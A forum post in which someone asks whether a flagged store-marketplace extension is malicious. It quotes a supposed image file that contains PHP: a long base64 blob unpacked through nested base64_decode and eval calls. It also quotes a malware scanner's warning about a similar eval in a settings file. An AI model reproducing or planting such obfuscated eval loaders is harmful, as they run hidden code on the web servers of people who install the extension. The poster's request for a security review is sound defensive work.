One of our extensions was flagged. Two of the files in the extension were brought to our attention as possible dirty files.
One is an image but it doesn't open in an image editor. I did open it up in Notepad and it shows PHP code?
Does this look suspicious? I don't want to raise the alarm just yet or contact the author. It's an extension in the marketplace.
Code: Select all
<?php $eJOB = 'ICRyUXRUID0gJ0lDUkZhRTlZSUQwZ0owbERValZsUjJSWFNVUXdaMG93YkVSVmFrcHJZa1UxY0ZOVlVYZGFNRzkzWWtWU1ZtSnJjRlZaYkZKeVpVWk9WbFZZWkdGTlJ6a3pXV3RXYjFZeVNsbFJiVGxXWW01Q2RsbHRlRTlrVjA1RlZXMTRhVkl6VVRKV1ZFa3hVVEpHYzFSclpGTmlWRlpvVld4a2IyVnNjRVZTYm1SWFZsUkdTVmxyWkRCVk1ERlhZVE5rV0dFeFdrOVViR1JQVmpKS1IySkdhR2xXTW1oNFZrWmtlazFWTlZkaVJtUm9VbFUxVDFWc1pEUmxSbEp5V1hwR1ZsSXhXbGRWTWpWUFYwWmFSbU5JV21GU00xSjZWV3RhY21WWFVrWmxSazVPVmxjNU5WWnFSbE5VTVZsNVZXdGthbEp0YUZCV2ExWkxWRlphV1dOR1pFOVdiVko2VjJ0V2EyRkZNWE5YYkZaYVZsZE9ORmxVUm1GT2JGcDFVbTFHVTFZeFNqWlhhMk40VXpKT1IySXpjRkpoTTBKVlZUQlZNVTFXV2tWVWJrNVNUV3R3U0ZsVVRuTmhSazVIWTBWMFZsWkZjRlJVYlhocll6SkdSMVJzWkZkTlJuQmFWa1phYTA1SFJsWk5TR2hZVjBkU1ZWUlZaRk5oUmxKWFdrVjBhMUpzU25oVlZ6RnZWakpXZEdRemFGWmxhMHBRV1hwQk1HUXlUa1pWYlVaT1lsaG9URlpHWkhkU01sRjRZa1JhVldGNmJIRlZha0ozVFVaa1ZWTnVUbFZTYkZreVZtMXdRMWR0Um5KalJsSmFWbGRTVEZWclduWmxWMHBJWTBVMWFWWXlaRFZXTW5Sdll6Rk9kRlJyV2xCVFNFSlBWVEJWTVZReFZsVlRibkJPVFZVMU1Wa3dhSGRaVlRGWlVXeHNWMUo2UVRGWlZtUlhWbXhLZFZac1VtaE5SRll5VjFaU1MxTnRWbGRWYmtaVFlsZDRXRlJXV25abFJtUnlWbXM1YW1KV1NsbFZNV2h6VkRGS05tSkZkRnBpUmxWNFZGZDRjMlJGTlZkVWJXeFRUVlp3UzFac1l6RlZNV3hYVjJwYVYxZEhhRlZXYWtvelRVWnNjMXBHVGxoU1ZGWlpXVEJrTUZVd01YVmFNMnhZVm5wR2VsbHFTa3RTYlZKSFlrZHdUbUZzV2xKWGJGcFhVekpOZUZwR1ZsUmlWR3h5V1ZSS05GSldaSEpoUlU1YVZqQmFXVmxWYUU5V1ZrbzJWbXhTV2xaWFVsQmFSVnAzVTBkV1NHUkdTbXhpUm13MFZqRmtkMU14VlhsVGEyUldZbXhLVkZsdGVFdGhSbHBWVVd0a2FVMVdXa2hXUjNSTFlVWmFjazVXWkZWaVJuQklWbXBHWVdNeFNuVlJiRkpYVmxSV2FGZFhlRmRqTVU1SFYyeHNWMkpZVWxSVVZWcDJUVlpaZVdORmRGZE5SRVpIV2xWb1UxUXhaRWRqUjJoV1lXdGFhRlpWV210V01XdDZZVWRzVTFZemFFWldWM2hUWXpGT2MxSllaR3BTYkhCWFdXdGFkMlJzV25OWGEyUlhUVlUxZVZZeWVFdFdhekZJWlVST1ZrMXFWak5hVjNoMlpVZE9SMkZHVm1sV1IzaDNWMnhhVjFJeVVsZGFTRTVWVmtWYWNsUlhjekZOUmxwMFkwVjBXbFpzYnpKV2JHaHJWbTFGZVZWc2FGcGlSbkI2VmpGYVlXUldVblJrUmtwT1lsWkplbFpyVWs5ak1rWnlUa2hrYVZKWGFGaFpiR2hEWWpGV2RXTkhPV2xpUlRWNFZrWm9hMkZzU2xWaGVrWllWMGhDY2xVeWVFcGxSbVIxVW14d1YxWXdNSGRXTW5CRFpHMVdjazFWYkZKaVJVcHpWbXBCZDJWc1ZYaFdiWFJYVFd0YU1GVnRkRzlWUmtsNVZXdDRZVlo2Vm5KVVYzaHpUbXhPY2s5WGVGZE5SbkJoVmxaa2QxRXhWbGhTYkdoVlZrVTFWVlpzWkZOWFJteFlUVlZrVkZKVWJFbFhhMVl3WWtkS2RHRkliRmhXYkhCMlZqSjRkbVZIUlhwaVIzaFRUVzFvZUZaR1VrSmtNRFZYVkd4b1RsTkhhSEpaYTJoRFUxWldkRTVWT1ZSaVJXdzBXVEJqTlZkSFJYbFZiR1JhVm14YWVsVXdXbGRrUjBaSVpFWk9UbEpzYkROV2FrWnFaVVpKZVZKdVVsTlhSM2hYV1cweE5HTkdVbFZSYTFwUFZtczFXVlJzVlRWVWJFcDBaVVp3VjFaNlZrUldNakZYVm0xS1NFNVdhR2hOYkVwSlZrWldZV014V2taTlZteFVZbFZhV1ZWcVRtOWtNV1JZWTBWMFUwMXNXbGhaTUZaWFZHeEplV1ZIYUZwaVJscG9XbGQ0YzA1c1RuTlhiV2hYVmpOb1NsZFhkR3ROUmxaWFZsaGthbEpGU21GV2JURnZWVVp3V0UxVlpGaFNWRlpaVkd4V2QyRkdXbFppZWtwWVlURmFkbGw2U2s1bFIwNUhWbXMxVTAxdWFIcFhWbHBUVWpKUmVHSklVazVXYXpWd1ZXcEdZVkpzYkhWalJtUldVbXh3U1ZremNFZFdWVEI1WlVWMFZHVnJTak5VYlRGT1pWWndTRkpzWkU1U1JsbDVWakZqTVdNeFJuUlRiazVTWVRKb1YxbHRkRXRqYkd4WFZtdDBhbFp0ZUhsWGExWnJZa2RLVms1RVNsVldWMUo2V1ZaYVlVNXRTa2xUYkdoWFlsWkdObGRyVm1Ga01VNUlVMnRvYUZJeWVGUmFWekUwVFZaVmVGWnRjR3hTTVVwNldUQldiMVV5U25KT1ZUVlhZV3MxZGxwR1drOVdiR3Q2WVVkMGFWTkZTa3BXVnpBeFZERlNWMWRZYkd4U1JWcFpXV3hTUWsxR2JGZFhhMDVxVW0xM01sZHJWbmRWTURGWFkwaG9XRlpzV25GVWExcDJaREpPUlZkdGVGTk5NVXAyVm1wQ1lXTXlTbk5hUmxaVVlXeEtiMVZxUVhoT2JGcEhWVzVPVkdKVmNGWlZiWEJMVjBkRmVWVnJhRnBsYTBrd1ZqQmFVMlJXWkhSaVIyeHBVbGhDTmxZeFkzZE5WbFowVW14YWFWSlhhSEJWYWs1VFZXeGFWVkZ1WkU1U2JYaDRWVEo0VDJGR1NYZGpSVlpWVm0xU00xbFdWWGhqVmxwWldrWm9hVkl3TVRSV1JsWlhZekpPVms1VmFFOVdhMHB6Vm14V2QyVnNXWGhWYTNScFRXeEtlVmxyVmxOWGJWWjBZVWRvVm1GcmIzcGFWbHBQVm14d1JrOVhjRTVXTTJoaFZtdGpNV1F4VmxkV1dHUnFVa1ZLWVZsWGRIZFdSbXhXV2tWMFUxSlVSbGxVTVdSSFZqQXhSMk5JYkZkTmJtaDJWVEl4UjFadFNrWmlSbFpvWVRCd2VsWnRjRTlpTWsxNFZtdGtWV0V6VW05V2JURTBWMVphU0U1VmRGcFdWRUl6V1RCU1MxbFdTblJVV0doYVZrVkpNRll3V2xOa1ZtUjBZa1pPYkdKWVkzaFdhMUpMWXpGUmVWTnJaR2xUUlZwWFZqQmtiMVZHVm5KV2JGcE9UVlUxV1ZsdWNFTmhWMFkyWVhwR1ZsWjZSVEJXTW5ONFpFZEdSVk5zVWxkV1ZGWjRWa1JDYTFJeFNsZFdiR2hoVW01Q1QxbHRNVzlrYkdSWlkwVTVWV0Y2YkZkWmEyaFRWR3hrUjJOSGFGWmhhMHBvV2xkNFUxSXlSa2RVYlhCVFRWVndTbGRzVm10T1JrNTBVbXhhVkdGc2NHaFZiR1J2Wld4c05sSnVaRmRXVkVaSldXdGFkMVJ0Um5SbFJGcFlWak5DVUZVeWN6RmpiVVY2V2tab2FFMXNTbFZYVm1NeFZESk9SMVpyYUd4U00xSnZWV3BCTVUxR1VuTmhSVTVvVmpCd1dWWkdVbE5XVmtwR1kwaFdWVlpXY0VSWk1GcHpUbXh3Um1OR1RrNVdia0kwVmpGYVYyRnJOVWRpTTJScVVrWndjbFJVUm5kaFJsWnhVMnBPYkZac1drbFphMlIzVkRBeFNHVkZiRmRpVkVZeldWVmFTMDV0UmtoT1ZsSnBZbXRGZDFkV1VrdFNNV1JYV2tab1lWSnVRazlaYlRGdlpHeGtXV05GT1ZWaGVteFhXV3RvVTFSc1pFZGpSMmhXWVd0S2FGcFhlRk5TTVhCR1pFZDBhVk5GU2t0WFZsSkxZekZXV0ZKc2FGVldSVFZWVm14a1UxZEdiRmhOVldSVVVsUnNTVmRyVmpCaVIwcDBZVVJDV0Zac2NISldha3BPWlVkT1JtSkdWbWxYUjJoNVZsZDBVMVV5VWxkVldIQnBVbFUxY0ZWdE1UQk9WbXhXWVVkR1ZHSkZWalZXUmxKVFYwZEZlVlZ1Y0ZWV00xSjZWVEJhUzJSV1VuUmhSbVJPWWtWc05GWnNWbUZVTVUxNVVtNU9hbEp0YUZCV2ExWkxZVVpaZDFadVRtcFNhelZYV1ZWVk5WUnNTWGhYYkd4aFZsZFJNRlpXV2xaa01rNUpWV3h3YUdFeWREUldSbFpYVGtaa1YxVnVWbEppV0dod1ZtMTRWbVZXWkZobFIzUlhUV3RXTlZWdGVITldNa3B6VTJ4R1lWWnNXbmxaTW5oaFVteHdTVlJ0YUdsVFJVcGFWa2Q0YjJReGJGZFdXR1JVWW10d1dWWnRNVzlXUm14V1ZtNU9WRkpyY0RGWmEyUkhWbXN4Um1JelpGaFdiSEIyVmtSS1YyUkdTbk5oUlRsWFpXeGFURlpzVWtOVE1WWnpZa2hLWVZKdFVtOVZha0Y0VGxaYWMxcEhkR2hTYkc4eVZtMXdZVmxXU2xoVmEyaGFaV3R3VEZWcldrZGpWa1owWVVaT1RsWnNjREZXYWtvMFlqSkpkMDFWWkdwU2JXaFFWakJvUTJJeFduVmpTRTVPVm1zMVYxZHJWbXRoVjBwSVpVWnNXbUV5YUZoV1JtUkhaRmRHU1ZGc2NFNWlXR2hFVjJ0a05GRXlUblJUYTJoT1ZsaENWVlZzVm5aTlZtUllZMFYwVkUxck1UUlpNRnB2Vkd4SmVWVnVSbFZXUlZwTVdrUkdjMk5zY0VWVWJVWk9ZWHBXU2xadE1ERmpNa1p5VFZoU2JGSkdjR2hWYkZVd1pXeGtjVk5yT1ZSU01WcEpXbFZhZDFkR1NsVldibkJXVFZaYWNsWkVTbE5rUms1MVZteGFhVll5YUdoV1JsSkhVakpLYzJORlpHaFNWRlpvVkZab1EwMUdVWGhoU0U1VVlrVnNNMVl5Y0dGWGJWWnlZMGh3WVZaNlJsUlZNRnBMWkZaYWMyTkZOV2xTYkd3MFZteFdWMVJyTlZoU1dHeFRZa2Q0V1ZaVVRsTlVSbkJZVGxVNWFXSkhVbnBYYTFVMVlWVXhjbUo2UmxaV2JVMTRWbFphUjA1dFNrbFZiSEJYWWxaS1dWZFljRWRrTVU1WFZXNVNiRkl6VWxSVmExcExUVlphUlZSdVRsSk5hM0JJV1ZST2MyRkdUa2RqUlhSV1ZrVndUMVJyV2xOU1ZrNXpWRzF3VTAxVmNEUldSM1JxVFZaV1NGWnNXbFJpYXpWWlZtdFdkMlJzY0Voa1NFNVRVbTEzTWxsVlZYaFViVXBHWTBST1dHRXlVakpVVldSTFkyczVWVlpzU21sWFIyaG9Wa1pqZUdJd01YTlViRnBWWWxoQ1VWVnNhR3RPVmxwWVRsVk9hRTFyV25oV1Z6VlhWbFV3ZVdWRlVscGhNWEI1V2xaa1IxTldaSEpqUmtwT1lYcEJkMVpyVmxOVE1WVjVWR3RvVm1KcldsQlZibkJYVlZad1YxWnJXbEJXV0VFeVdYcEtNRlpzU2xsYVJ6VldVbXMxUTFsdGRIZFRSMUpJWWtkb1VrMUZWVEZWTVZaclV6SkdTRlJZYkZkV1JYQlFWVzF3YzJOc1pITmFSVGxyWWtoQ1NWWnNZelZUTVVsNlZXdDRXbUZyTlZkWk1GVTFUbFpHZEdWSGRHbFdWbkEyVlhwQ1QxVXlUbk5pU0ZKaFRUQktVVnBXWkU1Tk1XUnpZVWRHYUZJd2NFVlhha293Vm14S1dWcElaRlZOTWswMVZVWk9hazR3Y0VoV2FrSktVa1JDYmxOdWJGTlNNVlYzVFVka1VWVXdTbkJYVm1oUFlrVTFjVlZ0V21GU01WcHhXV3BLVTJKRmRFUlZha3ByWWtVMWNGTXhVbnBhTVhCWlYyMW9hVkV5WkhKVmJYaFBWR3QwVldNeU5WQk5iRmw1VjFaa00ySXdjRWhXYWtKTVZraE5PVXA2YzJ0a00wbG5VRk5CYmtwSE9XbFplVUU1U1VkS2FHTXlWVEpPUmpscldsZE9kbHBIVlc5S1NHdzBXakZaY0U5NVFteGtiVVp6UzBOU2RsbHRUWEJQZVdNM1dsaGFhR0pEWjJ0a00wbHdUM2M5UFNjN0pIUnRJRDBnSnlSamFIRWdQU0JpWVhObE5qUmZaR1ZqYjJSbEtDUkZhRTlZS1RzZ1pYWmhiQ2drWTJoeEtUc25PMlYyWVd3b0pIUnRLVHM9JzskcUwgPSAnJEhPYSA9IGJhc2U2NF9kZWNvZGUoJHJRdFQpOyBldmFsKCRIT2EpOyc7ZXZhbCgkcUwpOw==';$OV = '$Kyp = base64_decode($eJOB); eval($Kyp);';eval($OV);?>
The other file is the settingsp.php code with similar code. The warning we got was:
WARN: Found suspicious file: admin/model/extension/module/xxxxxxxxxx-settings.php (NOT CLEANED) - Manual inspection required (rex.eval_var.002): Content: '';eval($bh);?>'.